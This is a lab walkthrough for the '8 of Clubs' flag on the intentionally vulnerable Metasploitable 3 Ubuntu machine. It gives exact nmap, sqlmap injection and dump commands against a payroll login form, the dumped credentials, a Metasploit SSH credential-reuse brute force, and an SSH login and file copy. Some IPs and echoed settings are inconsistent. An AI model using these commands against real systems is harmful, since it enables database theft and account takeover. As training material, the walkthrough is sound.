---
title: 8 of Clubs
description: Metasploitable 3 Ubuntu - 8 of Clubs
extends: _layouts.documentation
section: content
---

# 8 of Clubs

1\. First, get logged into your Kali Linux instance. Checkout the [Quickstart Guide](/walkthroughs/metasploitable-3-ubuntu/quickstart/) if you're not sure how to do this. 

Next, let's start off by running the same `nmap` scan we ran in the first step of the [Ace of Clubs](/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs) walkthrough guide.

```bash
# replace 165.22.171.133 with the IP of your target machine
$ nmap -p 1-65535 165.22.171.133
```

>Hint: Refer to the [Ace of Clubs](/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs) walkthrough guide if you need a refresher on what we're doing with this `nmap` command.

2\. navigate to port 1180 in a browser to see an open directory.

<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/1-port-80.PNG">

3\. Explore the links until you find the payroll app.

<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/2-payroll-app.PNG">

4\. Find the login form. Open up the [developer tools](/essentials/browser-developer-tools), and submit anything just to test out the form.
See that we're passing in `user`, `password`, and `s` data fields to the server through a `POST` request.

<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/3-form-data.PNG">

6\. Now let's use the information gathered in the previous step in the `sqlmap` tool.
In this case we will tell it 

>Hint: `sqlmap` is a command line tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
>Checkout the [official documentation](http://sqlmap.org/) for the `sqlmap` tool to learn more.

We're going to use `sql` map to automate the process of trying common SQL injection techniques to see if it can find an SQL vulnerability in this login form.
Here are the parameters we'll use:

* `-u` - specifies the target URL.
* `--data` - Data string to be sent through the `POST` request (which we've gathered in the previous step).
* `--tables` - Enumerate tables
* `--columns` - Enumerate columns

```bash
$ sqlmap -u http://165.22.142.144:1180/payroll_app.php --data="user=admin&password=admin&s=OK" --tables --columns
```

```bash
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

...it will give you some basic information here..
...and then ask you this question...

there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: user, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0

...more results showing the different databases and tables, here is the important one...

[16:32:31] [INFO] fetching columns for table 'users' in database 'payroll'
Database: payroll
Table: users
[5 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| first_name | varchar(30) |
| last_name  | varchar(30) |
| password   | varchar(40) |
| salary     | int(20)     |
| username   | varchar(30) |
+------------+-------------+

```

7\. Interesting! There is a table `users` with columns for `username` and `password`.
Let's dump the information from these two columns into a csv file using the same `sqlmap` tool.
Parameters to use:

* **--dump** - dump results
* **-C** - columns to dump
* **--csv-del** - what to use as delimiter for csv file
* **-v 1** - verbosity level, anything  >= 1 will output csv file path

Here is the interesting part of the result
```bash
$ sqlmap -u http://165.22.171.133/payroll_app.php --data="user=admin&password=admin&s=OK" --dump -C username,password --csv-del=" " -v 1
```

```bash
[16:52:32] [INFO] fetching entries of column(s) 'password, username' for table 'users' in database 'payroll'
Database: payroll
Table: users
[15 entries]
+------------------+-------------------------+
| username         | password                |
+------------------+-------------------------+
| leia_organa      | help_me_obiwan          |
| luke_skywalker   | like_my_father_beforeme |
| han_solo         | nerf_herder             |
| artoo_detoo      | b00p_b33p               |
| c_three_pio      | Pr0t0c07                |
| ben_kenobi       | thats_no_m00n           |
| darth_vader      | Dark_syD3               |
| anakin_skywalker | but_master:(            |
| jarjar_binks     | mesah_p@ssw0rd          |
| lando_calrissian | @dm1n1str8r             |
| boba_fett        | mandalorian1            |
| jabba_hutt       | my_kinda_skum           |
| greedo           | hanSh0tF1rst            |
| chewbacca        | rwaaaaawr8              |
| kylo_ren         | Daddy_Issues2           |
+------------------+-------------------------+

[16:52:32] [INFO] table 'payroll.users' dumped to CSV file '/home/hacker-lab/.sqlmap/output/165.22.171.133/dump/payroll/users.csv'
[16:52:32] [INFO] fetched data logged to text files under '/home/hacker-lab/.sqlmap/output/165.22.171.133'
```

8\. `sqlmap` dumps the results at  `/home/hacker-lab/.sqlmap/output/165.22.171.133/dump/payroll/users.csv`
You should be able to use any of these credentials to login to the payroll app.

```bash
username password
leia_organa help_me_obiwan
luke_skywalker like_my_father_beforeme
han_solo nerf_herder
artoo_detoo b00p_b33p
c_three_pio Pr0t0c07
ben_kenobi thats_no_m00n
darth_vader Dark_syD3
anakin_skywalker but_master:(
jarjar_binks mesah_p@ssw0rd
lando_calrissian @dm1n1str8r
boba_fett mandalorian1
jabba_hutt my_kinda_skum
greedo hanSh0tF1rst
chewbacca rwaaaaawr8
kylo_ren Daddy_Issues2
```

9\. Next we are going to use the **ssh auxiliary module** in metasploit to see if any of these user/password combinations were re-used as ssh credentials.
Let's start by opening up msfconsole.

```bash
$ msfconsole
```

>Hint: The Scanner SSH Auxiliary module can brute force ssh servers using a provided list of username and passwords.
>In our case we'll be using the list we retrieved from the database dump.
>See the [Offensive Security Documentation](https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/) to learn more.

10\. Use the **Scanner SSH Auxiliary** module to see if any of the username/password combinations we found for the payroll app were re-used as ssh login credentials. 
```bash
msf > use auxiliary/scanner/ssh/ssh_login
```

Show what options this module has
```bash
msf auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts
```

11\. Set the required options. See the output from `show options` for an explanation of each options we'll set.
```bash
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 165.22.171.133
RHOSTS => 165.22.171.133

msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hacker-lab/.sqlmap/output/165.22.171.133/dump/payroll/users.csv
USERPASS_FILE => /root/.sqlmap/output/165.22.171.133/dump/payroll/users.csv

msf auxiliary(scanner/ssh/ssh_login) > set RPORT 2322
RPORT => 2222

msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
```

12\. Run the module to see which username/passwords were successful.
```bash
msf auxiliary(scanner/ssh/ssh_login) > run

[-] 157.230.155.174:2322 - Failed: 'username:password'
[!] No active DB -- Credential data will not be saved!
[+] 157.230.155.174:2322 - Success: 'leia_organa:help_me_obiwan' 'uid=1111(leia_organa) gid=100(users) groups=1
00(users),27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x
86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (172.18.0.2:43927 -> 157.230.155.174:2322) at 2019-05-02 21:17:10 +0000
[+] 157.230.155.174:2322 - Success: 'luke_skywalker:like_my_father_beforeme' 'uid=1112(luke_skywalker) gid=100$
users) groups=100(users),27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:$
1:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 2 opened (172.18.0.2:35217 -> 157.230.155.174:2322) at 2019-05-02 21:17:21 +0000
[+] 157.230.155.174:2322 - Success: 'han_solo:nerf_herder' 'uid=1113(han_solo) gid=100(users) groups=100(users$
,27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x8$
_64 x86_64 GNU/Linux '

... more results
```

we'll choose one of the successful credentials and ssh into the target
```bash
$ ssh -p 2322 leia_organa@157.230.155.174
leia_organa@157.230.155.174's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
New release '16.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

leia_organa@metasploitable3-ub1404:~$
```

Woot! this means we have a shell on the victim machine as user `leia_organa`.
Let's search for any flags out in the open.
```bash
leia_organa@metasploitable3-ub1404:~$ find /home -iname "*_of_*"
find: `/home/greedo/.cache': Permission denied
find: `/home/han_solo/.cache': Permission denied
find: `/home/kylo_ren/.secret_files': Permission denied
find: `/home/kylo_ren/.cache': Permission denied
/home/anakin_skywalker/96/66/27/71/85/22/7/25/37/67/22/77/87/57/34/22/93/40/8/10/8_of_clubs.png
find: `/home/anakin_skywalker/.cache': Permission denied
/home/artoo_detoo/music/10_of_clubs.wav
find: `/home/artoo_detoo/.cache': Permission denied
find: `/home/jarjar_binks/.cache': Permission denied
find: `/home/leia_organa/.cache': Permission denied
find: `/home/lando_calrissian/.cache': Permission denied
find: `/home/luke_skywalker/.cache': Permission denied
find: `/home/boba_fett/.cache': Permission denied
find: `/home/jabba_hutt/.cache': Permission denied
find: `/home/ben_kenobi/.cache': Permission denied
find: `/home/vagrant/.ssh': Permission denied
find: `/home/vagrant/.cache': Permission denied
find: `/home/c_three_pio/.cache': Permission denied
```

13\. We'll copy the `8_of_clubs` back to our Kali Linux instance using `scp`.
Back out of the victim box with `exit`.

```bash
$ scp -P 2322  leia_organa@157.230.155.174:/home/anakin_skywalker/96/66/27/71/85/22/7/25/37/67/22/77/87/57/34/22/93/40/8/10/8_of_clubs.png ~/
leia_organa@157.230.155.174's password:
8_of_clubs.png                                                               100%  528KB 917.7KB/s   00:00
```

>Hint: `scp` is a command line tool that allows you to securely copy files between local and remote hosts.
>Checkout our [essentials documentation](/essentials/scp) to learn more.



14\. Once you're back on your Kali instance, run `exit -y` to exit your `msfconsole` session.
`8_of_clubs.png` should be visible in your home directory.
```bash
$ ls
8_of_clubs.png
```

15\. Now copy the image from you Kali Linux instance back to your local computer. 
Replace `178.128.77.75` with the IP address of your Kali instance.
```bash
# run this from your local computer
# replace 178.128.77.75 with the IP of your Kali Linux instance
$ scp -P 2222 hacker-lab@178.128.77.75:/home/hacker-lab/8_of_clubs.png ./
```

15\. And we've captured another flag!

<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/8_of_clubs.png">